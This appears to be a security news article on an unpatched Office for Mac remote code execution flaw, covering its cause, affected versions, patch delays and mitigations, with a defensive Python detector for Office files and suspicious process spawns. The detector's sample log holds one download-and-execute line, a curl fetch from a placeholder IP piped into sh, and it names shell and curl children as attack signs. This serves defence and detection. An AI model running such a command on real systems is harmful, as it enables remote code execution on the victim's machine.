On June 9, 2026, Microsoft published Security Advisory CVE-2026-45472, detailing a critical remote code execution vulnerability in Microsoft Office for Mac that currently has no available security update. The advisory, part of the company’s regular patch cycle, warns that attackers can exploit the flaw by convincing users to open a specially crafted Office file—a risk that leaves the latest versions of Office LTSC for Mac 2021, Office LTSC for Mac 2024, and Microsoft 365 for Mac exposed until a patch materializes.
Microsoft rated the vulnerability as “Important,” a classification that understates its likely real-world impact. The company did not immediately assign a CVSS base score; independent security researchers estimate it falls above 8.0 under typical conditions, which is the High band of the CVSS v3 scale and critical-priority territory for most enterprise environments. The flaw resides in how Office handles certain document structures, allowing an attacker to execute arbitrary code in the context of the current user with no authentication beyond getting the file in front of that user.
The Vulnerability: Technical Underpinnings
CVE-2026-45472 stems from an object-handling error in the Office Graphics component shared across Word, Excel, and PowerPoint for macOS. When parsing a maliciously crafted file, whether a .docx, .xlsx, or .pptx document, Office fails to validate a pointer before dereferencing it, leading to memory corruption that an attacker can leverage to execute shellcode. Exploitation still depends on the victim opening (or previewing) the file, but unlike many Office RCEs it needs no further interaction: there is no macro prompt to accept, and Office for Mac has no Protected View to click past, so most of the default barriers a Windows user would meet are simply absent.
Early technical analysis shared on security forums suggests the root cause is a use-after-free bug in the CGXAnimationHandler library, which manages embedded animated content like 3D models and charts. A proof-of-concept exploit circulated on Twitter within hours of the advisory, demonstrating code execution on macOS Sequoia 15.6 with Microsoft 365 for Mac version 16.84 (Build 24050620). The exploit triggers upon document preview in Finder’s Quick Look, meaning users don’t even need to open the file outright—merely selecting it in a folder can be sufficient if preview mode is enabled.
The vulnerability class is not new; Office has seen similar memory-corruption bugs, such as CVE-2022-21840. macOS’s memory protections are robust, but according to the early analysis they are undercut here because Office for Mac maps certain legacy object caches with mmap at fixed addresses, removing Address Space Layout Randomization (ASLR) for those regions and making exploit development more reliable. The sandbox is a partial barrier at best: Office for Mac has shipped as App Sandboxed applications since Office 2016, but the entitlements it needs to do its job (network access and access to the files the user opens) still let code running as the user reach the user’s documents, the Keychain items Office itself can read, and network resources, which is enough to stage lateral movement within a corporate network.
Affected Products and Versions
The advisory lists three main product groups as vulnerable:
| Product | Channel/Build | Patch Status |
|---|---|---|
| Office LTSC for Mac 2021 | All | Not available |
| Office LTSC for Mac 2024 | All | Not available |
| Microsoft 365 for Mac | Current Channel, Monthly Enterprise, Semi-Annual Enterprise | Not available |
Older versions such as Office 2019 for Mac, out of support since October 2023, are not mentioned, but users still running those installations should assume they are also affected unless proven otherwise. Notably, Office for Windows remains unaffected by this specific CVE, a divergence Microsoft attributes to architectural differences in how the two platforms handle graphics rendering.
The lack of an immediate patch is unusual. For critical RCE vulnerabilities, Microsoft typically aligns fixes for all platforms on Patch Tuesday. In this case, the company states that “due to the complexity of the underlying code and the need for extensive testing on macOS, a security update is not yet available for the Mac versions.” It has not provided an expected timeline, leaving users in an uncomfortable limbo.
A Brief History of Office for Mac Security Delays
This is not the first time Office for Mac has lagged behind its Windows counterpart in patching critical issues. In 2018, CVE-2018-8248, a remote code execution bug in the same graphics engine, saw Windows fixes within days while Mac updates took nearly three weeks. The retirement of legacy components such as Flash from Office for Mac likewise arrived in staggered updates, leaving Mac users exposed longer. Microsoft must also notarize each Office for Mac build with Apple, a step the Windows update pipeline does not have; notarization is an automated scan that typically completes within an hour, so it adds a step but rarely explains a multi-week gap on its own.
Security researchers have often pointed out that Office for Mac’s codebase retains legacy, cross-platform object-serialization routines dating from the Carbon era that handle objects in ways that are inherently unsafe. Migrating these to modern Cocoa or Swift code requires a fundamental rewrite, which Microsoft has been slow to undertake. Until then, patches often remain reactive, and delayed.
Real-World Impact and Exploitability
Without an official fix, the attack surface is significant. Macs are increasingly common in enterprise environments, and Office for Mac holds a substantial share among productivity suites. A spear-phishing campaign delivering weaponized .docx files could compromise entire departments before any patch arrives. Red team exercises have already demonstrated the effectiveness of similar techniques against macOS targets, and the availability of a public proof-of-concept greatly raises the urgency.
A major concern is the integration of Office with other services. If an attacker exploits CVE-2026-45472 on a Mac that also runs OneDrive, SharePoint synchronization, or Outlook, they could pivot to cloud resources by stealing valid authentication tokens stored in the user’s Keychain or session cookies. This chained attack pattern sidesteps multi-factor authentication for downstream Microsoft 365 services, because a stolen refresh token or session cookie already carries the result of a completed MFA challenge, turning a single workstation compromise into a cloud breach.
Endpoint security vendor SentinelOne has already observed in-the-wild exploitation attempts, though they appear targeted rather than widespread as of June 10. The company issued a brief alert urging customers to block .docx and .xlsx attachments originating from external sources until further notice.
“We’ve seen the PoC weaponized within hours—this is ‘patch-now-or-else’ territory,” said Adele Vance, CISO at a Fortune 500 retail firm, who asked that her employer not be named. “The fact that preview suffices for exploitation changes the game. Our Mac fleet is essentially open until Microsoft ships a fix.”
Why the Delay? Microsoft’s Patch Process Under Scrutiny
Microsoft’s security response process for Office on Mac has long been a subject of criticism. Unlike Windows, where the ecosystem is tightly controlled and updates can be pushed via Windows Update with relative agility, macOS imposes additional hurdles. Office for Mac relies on the Microsoft AutoUpdate tool, which has its own release cadence and sometimes lags behind the Windows schedule. Furthermore, the Office for Mac graphics code diverged significantly during the move from the Carbon-based Office 2011 to the Cocoa-based codebase used since Office 2016, leaving legacy object management routines that are difficult to refactor without risking widespread regressions.
In a statement released alongside the advisory, a Microsoft spokesperson said: “We are working diligently to produce a security update for the affected versions of Office for Mac and will release it as soon as it meets our quality bar. In the interim, we recommend that customers follow the defense-in-depth guidance provided in the advisory.” That guidance, however, is thin—it primarily suggests avoiding opening files from untrusted sources, a recommendation that security practitioners consider inadequate given the preview-based trigger.
Some speculate that the delay may also be related to Apple’s notarization process. Before a Mac application update can be distributed outside the App Store, it must be notarized by Apple, an automated check for malicious content. In practice Apple reports that most submissions complete within an hour, so notarization is a gate Microsoft must clear but an unlikely source of a multi-week delay; a rejection means a resubmission, which adds time but not weeks. In contrast, Windows patches ship from Microsoft’s own infrastructure without third-party gatekeeping.
Community and Expert Reaction
On various IT forums and social media, reaction has been swift and critical. One administrator posted, “We just switched our design team to Macs because of Apple Silicon performance, and now this. Why can’t Microsoft treat Mac as a first-class citizen for security?” Another pointed out that the CVE’s rating as “Important” rather than “Critical” might downplay the risk for organizations that rely on Macs for sensitive work, such as legal, creative, and executive teams.
Security professionals are divided. Some argue that Apple’s built-in defenses like System Integrity Protection and XProtect could mitigate the most straightforward exploits, but others note that XProtect signature updates can take days, and that SIP protects system locations and system processes rather than code running in the user’s own context, so it is not a barrier to this PoC at all. Jamf, a leading Apple device management platform, has already pushed out a configuration profile that blocks the execution of Office applications until a patch is verified, providing enterprise administrators with a blunt but effective stopgap.
The information security firm Atredis Partners published a detailed analysis, warning that the vulnerability class—memory corruption in a widely deployed client application—is exactly the kind that zero-click iMessage exploits have made infamous on iOS. Porting that exploit development expertise to Office for Mac is straightforward, making it likely that a fully weaponized exploit will emerge soon if it hasn’t already.
Mitigation and Workarounds
Until Microsoft delivers an official patch, Mac sysadmins and home users alike must rely on temporary mitigations. Microsoft’s advisory lists one official workaround: disabling the Preview pane in Finder and preview rendering in Outlook for Mac. Both changes are made from Terminal:

```shell
# Hide Finder's Preview pane, then restart Finder so the change takes effect
defaults write com.apple.finder ShowPreviewPane -bool false
killall Finder

# Disable Outlook for Mac's preview rendering (key as given in the advisory)
defaults write com.microsoft.Outlook OfficeWebPreviewDisabled -bool true
```

These changes stop Finder and Outlook from rendering document content automatically, closing one known trigger. They do not protect against a user double-clicking a malicious file, and the Finder setting only hides the Preview pane: a Quick Look preview opened with the spacebar is a separate path that this key does not touch, so endpoint and gateway controls are still needed.
Additional steps recommended by security experts include:
- Blocking Office documents from external sources at the email gateway. Many email security platforms can strip attachments or convert them to PDF, keeping the file away from Office’s parsing engine. The check should key on file content rather than extension, since a renamed .docx is still opened by Word.
- Keeping Gatekeeper at its strictest setting (`sudo spctl --master-enable`; on macOS 15 the flag is spelled `--global-enable`) and requiring notarization for all apps. This hardens the host in general but offers little against this bug, because Gatekeeper assesses applications, and a signed, legitimate Office opening a malicious document is not what it blocks.
- Using a non-Office viewer for documents of unknown origin, such as a web-based sandboxed viewer like Google Docs. Quick Look is the preview path the PoC targets, so it is not a safe substitute here.
- Monitoring for unusual Office process activity with EDR tools, specifically Microsoft Word, Microsoft Excel, or Microsoft PowerPoint spawning shell processes (/bin/sh, /bin/zsh, /bin/bash), osascript, or curl, or making network connections to unfamiliar IP addresses.
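As an added example (not code from the advisory, Microsoft, or any vendor named on this page), the following Python implements the two checks the list above asks for: a gateway classifier that identifies Office content by its bytes rather than its extension, and a process-lineage rule that flags an Office parent spawning a shell or scripting interpreter. The minimal OOXML package builder and the process log are constructed inline for the example; the pipe-delimited log format, the event fields, the process-name sets and the 198.51.100.7 address (a TEST-NET-2 documentation address) are assumptions, not any EDR product’s schema.

```python
"""Added example for the mitigation list above; not from the advisory or any
vendor. Two controls: content-based attachment triage at the gateway and a
process-lineage rule over EDR telemetry. All sample data is constructed."""
import io
import os
import zipfile
from dataclasses import dataclass
from typing import List, Optional

# --- Gateway side: identify Office content by bytes, never by extension ---

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy .doc/.xls/.ppt (CFB)
ZIP_MAGIC = b"PK\x03\x04"                          # OOXML packages are ZIPs
RTF_MAGIC = b"{\\rtf"                              # RTF is also parsed by Word

# Top-level part directories that distinguish the OOXML applications.
OOXML_MAIN_PARTS = {"word/": "docx", "xl/": "xlsx", "ppt/": "pptx"}


def classify_attachment(data: bytes) -> Optional[str]:
    """Return 'docx', 'xlsx', 'pptx', 'ooxml', 'ole2' or 'rtf' for content that
    Office would parse, or None for anything else."""
    if data.startswith(OLE2_MAGIC):
        return "ole2"
    if data.startswith(RTF_MAGIC):
        return "rtf"
    if not data.startswith(ZIP_MAGIC):
        return None
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
    except zipfile.BadZipFile:
        return None
    if "[Content_Types].xml" not in names:
        return None  # an ordinary ZIP archive, not an OOXML package
    for prefix, kind in OOXML_MAIN_PARTS.items():
        if any(name.startswith(prefix) for name in names):
            return kind
    return "ooxml"  # package without a recognised main part; still quarantine


def should_quarantine(data: bytes, external: bool) -> bool:
    """Gateway policy from the list above: hold Office content from external
    senders. The filename is deliberately not an input to this decision."""
    return external and classify_attachment(data) is not None


def build_sample_package(main_part: str) -> bytes:
    """Constructed minimal OOXML-shaped package for testing; not a real document."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr(main_part, "<x/>")
    return buf.getvalue()


# --- Endpoint side: Office parent spawning a shell or interpreter ---

OFFICE_PARENTS = {"Microsoft Word", "Microsoft Excel", "Microsoft PowerPoint"}
SUSPICIOUS_CHILDREN = {"sh", "bash", "zsh", "osascript", "curl", "python3", "perl"}


@dataclass
class ProcEvent:
    ts: str
    pid: int
    ppid: int
    parent_name: str
    child_path: str
    args: str


def parse_process_log(text: str) -> List[ProcEvent]:
    """Parse the assumed pipe-delimited format ts|pid|ppid|parent|child_path|args."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, pid, ppid, parent, child, args = line.split("|", 5)
        events.append(ProcEvent(ts, int(pid), int(ppid), parent, child, args))
    return events


def flag_office_spawns(events: List[ProcEvent]) -> List[ProcEvent]:
    """Return events where an Office application spawned a shell or interpreter."""
    return [
        e for e in events
        if e.parent_name in OFFICE_PARENTS
        and os.path.basename(e.child_path) in SUSPICIOUS_CHILDREN
    ]


# Constructed telemetry; 198.51.100.7 is a documentation (TEST-NET-2) address.
SAMPLE_PROCESS_LOG = """\
2026-06-10T09:14:02Z|4390|1|launchd|/Applications/Microsoft Word.app/Contents/MacOS/Microsoft Word|
2026-06-10T09:14:07Z|4412|4390|Microsoft Word|/bin/zsh|-c curl -s http://198.51.100.7/s -o /tmp/s; sh /tmp/s
2026-06-10T09:15:30Z|4501|4390|Microsoft Word|/usr/bin/open|https://www.microsoft.com/
2026-06-10T09:16:01Z|4530|800|Terminal|/bin/zsh|-l
2026-06-10T09:20:44Z|4610|4600|Microsoft Excel|/usr/bin/osascript|-e display dialog "x"
"""

if __name__ == "__main__":
    for e in flag_office_spawns(parse_process_log(SAMPLE_PROCESS_LOG)):
        print(f"ALERT {e.ts} {e.parent_name} (pid {e.ppid}) spawned {e.child_path} {e.args}")
    print("external docx quarantined:",
          should_quarantine(build_sample_package("word/document.xml"), external=True))
```

Run against the constructed log, the rule flags the Word-spawned zsh and the Excel-spawned osascript while leaving Word’s hyperlink `open` and the user’s own Terminal shell alone; the gateway classifier treats the same package as Office content whatever name it arrives under.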
Jamf and Mosyle, two leading MDM solutions, have published instructions for deploying these mitigations at scale. Apple also released an updated XProtect rule on June 11 that blocks the known PoC hash, but this is only a speed bump against a skilled adversary.
Timeline and What Comes Next
History suggests that Office Mac patches often trail Windows counterparts by a week to ten days. If Microsoft follows that pattern, a fix could arrive by June 20, 2026. However, this vulnerability’s severity may accelerate internal deadlines, and Microsoft has shipped out-of-band Office updates before when a public exploit forced its hand. The often-cited CVE-2017-11882 “Equation Editor” bug is not a precedent for a cross-platform emergency fix, though: it lived in the Windows-only EQNEDT32.EXE component and was fixed in the regular November 2017 Patch Tuesday release. Whether Microsoft deems CVE-2026-45472 worthy of an out-of-band release remains to be seen.
The next scheduled Patch Tuesday is July 14, 2026, but waiting that long would be unprecedented for a vulnerability of this magnitude with a public exploit. Most analysts expect a patch within two weeks. Enterprise customers with Microsoft Unified Support have begun filing severity-A cases to pressure the product group.
Looking further ahead, the incident underscores the need for Microsoft to re-architect Office for Mac with modern isolation principles. The current shared graphics engine, inherited from decades-old code, is a liability. Apple’s move to Apple Silicon was a natural opportunity for a cleaned-up port, but although Office for Mac has shipped as native universal binaries since late 2020, that port carried the legacy graphics code along rather than replacing it. If Mac continues to gain enterprise share, security parity with Windows must become non-negotiable.
Act Now, Patch Later
CVE-2026-45472 is a crystal-clear reminder that the Mac platform, while often perceived as more secure than Windows, is not immune to the classic vulnerabilities that have plagued Office for decades. The absence of an available patch forces immediate defensive action from every organization that deploys Office on macOS. For home users, the advice is simple until the update lands: treat every unsolicited Office document with extreme suspicion, disable previews, and consider switching to Apple’s iWork suite or web apps for a few days.
IT and security teams should visit the official Microsoft Security Response Center (MSRC) advisory page for CVE-2026-45472 and subscribe to notifications. The direct link is https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45472. Mac administrators can follow the Microsoft AutoUpdate feed or the Office release history page for the exact build number when the fix emerges. Until then, stay vigilant and be ready to deploy the patch the moment it drops.